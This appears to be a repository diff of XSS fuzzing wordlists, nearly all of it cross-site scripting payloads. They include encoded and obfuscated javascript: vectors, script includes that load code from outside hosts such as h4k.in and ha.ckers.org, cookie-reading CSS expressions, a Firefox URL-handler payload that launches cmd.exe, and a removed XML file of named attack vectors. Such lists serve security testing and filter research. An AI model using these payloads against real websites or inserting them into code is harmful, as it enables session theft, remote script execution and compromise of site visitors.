<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C
<script>var a = "</script> <script> alert('XSS !'); </script> <script>";</script>
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
*/a=eval;b=alert;a(b(/e/.source));/*
width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
<A HREF="http://1113982867/">XSS</A>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
\";alert('XSS');//
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
eval(name)
<A HREF="http://www.google.com./">XSS</A>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`>
<IMG SRC="javascript:alert('XSS')"
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
'';!--"<script>alert(0);</script>=&{(alert(1))}
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
<img src=`x` onrerror= ` ;; alert(1) ` />
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
style=color: expression(alert(0));" a="
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b))
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<A HREF="http://66.102.7.147/">XSS</A>
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
<BR SIZE="&{alert('XSS')}">
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
%0da=eval;b=alert;a(b(/d/.source));
<a href = "javas cript :ale rt(1)">test
+alert(0)+
<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;;
<body onload=a1={x:this.parent.document};a1.x.writeln(1);>
<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC="livescript:[code]">
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<A HREF="http://6&#09;6.000146.0x7.147/">XSS</A>
<IMG SRC="mocha:[code]">
style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
<IMGSRC="javascript:alert('XSS')">
b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
a=/ev/// .source a+=/al/// .source a[a] (name)
a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
setTimeout//
(name// ,0)
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
<SCRIPT SRC=http://ha.ckers.org/xss.js
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")>
</noscript><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<body onload=;;;;;;;;;;;_=alert;_(1);;;;
s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
<body <body onload=;;;;;al:eval('al'+'ert(1)');;>
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0)
<body/s/onload=x={doc:parent.document};x.doc.writeln(1)
<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1)
<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1)
123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>);
s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a)
o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___)
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d);
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
open(name)
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
alert(1)
<A HREF="//www.google.com/">XSS</A>
<SCRIPT SRC=//ha.ckers.org/.j>
0%0d%0a%00<script src=//h4k.in>
s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<A HREF="http://google.com/">XSS</A>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1))
a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b))
eval.call(this,unescape.call(this,location))
d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b)))
l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a
_=eval,__=unescape,___=document.URL,_(__(___))
$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__)
$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($))
evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod)
with(location)with(hash)eval(substring(1))
<IMG SRC=" &#14; javascript:alert('XSS');">
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<style>body:after{content: “\61\6c\65\72\74\28\31\29″}</style><script>
eval(eval(document.styleSheets[0].cssRules[0].style.content))
</script>
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
>"'
a=alert;a(0)
A=alert;A(1)
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
</textarea><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
http://aa"><script>alert(123)</script>
http://aa'><script>alert(123)</script>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>

1287
Fuzzing/XSS/robot-friendly/XSS-EnDe-h4k.xml
View file

File diff suppressed because it is too large Load diff

52
Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.txt Normal file
View file

@ -0,0 +1,52 @@
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){//
';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");}
'';!--"<script>alert(0);</script>=&{(alert(1))}
"><script>alert(0);</script>
'><script>alert(0);</script>
'<script>alert(0);</script>
<img src=x onerror=;;alert(1) />
</title><script>alert(1)</script>
`> <script>alert(5)</script>
</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code>
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
}</style><script>a=eval;b=alert;a(b(/i/.source));</script>
;}alert(0);{
"+alert(0)+"
xyz onerror=alert(6);
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
a=eval;b=alert;a(b(8));
a=1;a=eval;b=alert;a(b(11));//
';//%0da=eval;b=alert;a(b(9));//
";//%0da=eval;b=alert;a(b(10));//
'};a=eval;b=alert;a(b(13));//
"};a=eval;b=alert;a(b(12));//
1};a=eval;b=alert;a(b(14));//
'];a=eval;b=alert;a(b(15));//
"];a=eval;b=alert;a(b(16));//
1];a=eval;b=alert;a(b(17));//
1;a=eval;b=alert;a(b(/c/.source));
%0da=eval;b=alert;a(b(/d/.source));
*/a=eval;b=alert;a(b(/e/.source));/*
<script src=//h4k.in
<script src=http://h4k.in/>
<script src=//h4k.in></script>
"><script src=//h4k.in></script><
<scri
pt src=//h4k.in><
></script>
<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e
"><script src=http://h4k.in/i.js></script>
"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script>
"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script>
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))
" style="color: expression(alert(0));" a="
</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
<img src=`x` onrerror= ` ;; alert(1) ` />
" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a="
" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/
c%00""<script>alert(0);</script>
BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")}
x=alert;x(%26%2340 /finally through!/.source %26%2341);
%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//
http://aa<script>alert(123)</script>

534
Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.xml
View file

@ -1,534 +0,0 @@
<?xml version="1.0"?>
<!-- from: http://mario.heideri.ch/xss.xml
date: 03-jan-08
minor formal modifications
-->
<xss>
<attack>
<name> --- Reflective XSS Attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced XSS Locator</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{}&quot;);}alert(6);function xss(){//</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Advanced XSS Locator for &amp;lt;title&amp;gt;-Injections</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{&lt;/title&gt;&lt;script&gt;alert(5)&lt;/script&gt;}&quot;);}</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 1 (all quotes)</name>
<code>&apos;&apos;;!--&quot;&lt;script&gt;alert(0);&lt;/script&gt;=&amp;{(alert(1))}</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 2 (double quotes)</name>
<code>&quot;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 3 (single quotes)</name>
<code>&apos;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 4 (attributes)</name>
<code>&apos;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - credits go to Alex</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Semicolon XSS (HTML)</name>
<code>&lt;img src=x onerror=;;alert(1) /&gt;</code>
<desc>HTML Breaker - credits go to Kishor</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Title-breaker</name>
<code>&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>HTML-breaking XSS for backticked attributes</name>
<code>`&gt; &lt;script&gt;alert(5)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Textarea-breaker (onmouseover)</name>
<code>&lt;/textarea&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/g/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Noscrript-breaker (onmouseover)</name>
<code>&lt;/noscript&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/h/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Style-breaker</name>
<code>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/i/.source));&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Reflective JS XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>JS Breaking XSS 1</name>
<code>;}alert(0);{</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>JS Breaking XSS 2 (string concatination)</name>
<code>&quot;+alert(0)+&quot;</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>onerror XSS Injection</name>
<code>xyz onerror=alert(6); </code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>onclick XSS Injection</name>
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 1</name>
<code>a=eval;b=alert;a(b(8));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 2</name>
<code>a=1;a=eval;b=alert;a(b(11));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;;//%0da=eval;b=alert;a(b(9));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (double qouted)</name>
<code>&quot;;//%0da=eval;b=alert;a(b(10));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;};a=eval;b=alert;a(b(13));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (double qouted)</name>
<code>&quot;};a=eval;b=alert;a(b(12));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (non-qouted)</name>
<code>1};a=eval;b=alert;a(b(14));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (sinlge qouted)</name>
<code>&apos;];a=eval;b=alert;a(b(15));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (double qouted)</name>
<code>&quot;];a=eval;b=alert;a(b(16));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (non qouted)</name>
<code>1];a=eval;b=alert;a(b(17));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Int-breaking JS Injection (non qouted)</name>
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>CRLF-forced JS Injection</name>
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JS Comment breaker</name>
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name> --- JS Includes ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Tiny XSS Include 1 (20 characters, FFox only)</name>
<code>&lt;script src=//h4k.in</code>
<desc>Super-tiny inclusion vector - 20 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 2 (27 characters - all browsers)</name>
<code>&lt;script src=http://h4k.in/&gt;</code>
<desc>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 3 (30 characters - all browsers)</name>
<code>&lt;script src=//h4k.in&gt;&lt;/script&gt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 4 (HTML Breaking)</name>
<code>&quot;&gt;&lt;script src=//h4k.in&gt;&lt;/script&gt;&lt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - breaks HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Fragmented DOM XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Include Fragment Pt. 1</name>
<code>&lt;scri</code>
<desc>First part of a fragmented inclusion attack vector. Swallows the enclosed HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 2</name>
<code>pt src=//h4k.in&gt;&lt;</code>
<desc>Second part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 3</name>
<code>&gt;&lt;/script&gt;</code>
<desc>Third part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- HTML Injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced HTML Injection Locator</name>
<code>&lt;s&gt;000&lt;s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&amp;#60&amp;#115&amp;#62&amp;#51&amp;#51&amp;#51&amp;#60&amp;#47&amp;#115&amp;#62&amp;#x3c&amp;#x73&amp;#x3e&amp;#x34&amp;#x34&amp;#x34&amp;#x3c&amp;#x2f&amp;#x73&amp;#x3e</code>
<desc>HTML injection vector.</desc>
